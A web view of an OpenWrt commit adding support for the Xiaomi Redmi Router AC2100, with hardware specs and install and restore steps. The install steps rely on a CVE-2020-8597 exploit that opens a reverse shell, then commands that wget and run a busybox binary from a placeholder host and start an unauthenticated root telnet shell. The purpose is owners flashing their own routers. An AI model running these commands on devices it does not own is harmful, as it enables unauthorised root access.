aboutsummaryrefslogtreecommitdiffstats
path: root/package/kernel/lantiq
diff options
context:
space:
mode:
authorRichard Huynh <voxlympha@gmail.com>2020-04-23 12:50:21 +1000
committerPetr Štetiar <ynezz@true.cz>2020-05-20 15:26:22 +0200
commitf3792690c4f0567a8965d82898295b9d50c3bb7e (patch)
treee966559ec2507984b3f66cb6ca349c1f5a6a3566 /package/kernel/lantiq
parentc93cdf536a086deab0fa696989263a97b4d6c417 (diff)
downloadupstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.tar.gz
upstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.tar.bz2
upstream-f3792690c4f0567a8965d82898295b9d50c3bb7e.zip
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com>
Diffstat (limited to 'package/kernel/lantiq')
0 files changed, 0 insertions, 0 deletions